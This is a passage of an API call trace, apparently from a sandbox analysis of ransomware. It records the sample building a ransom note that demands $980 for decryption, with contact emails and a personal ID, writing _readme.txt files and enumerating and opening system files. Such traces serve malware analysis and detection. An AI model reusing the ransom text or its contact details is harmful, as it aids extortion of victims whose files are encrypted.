$490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.600] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.600] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.601] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*" (normalized: "c:\\boot\\es-es\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.602] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.602] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.603] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0183.603] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.603] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.603] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.604] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.604] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.630] RtlAllocateHeap 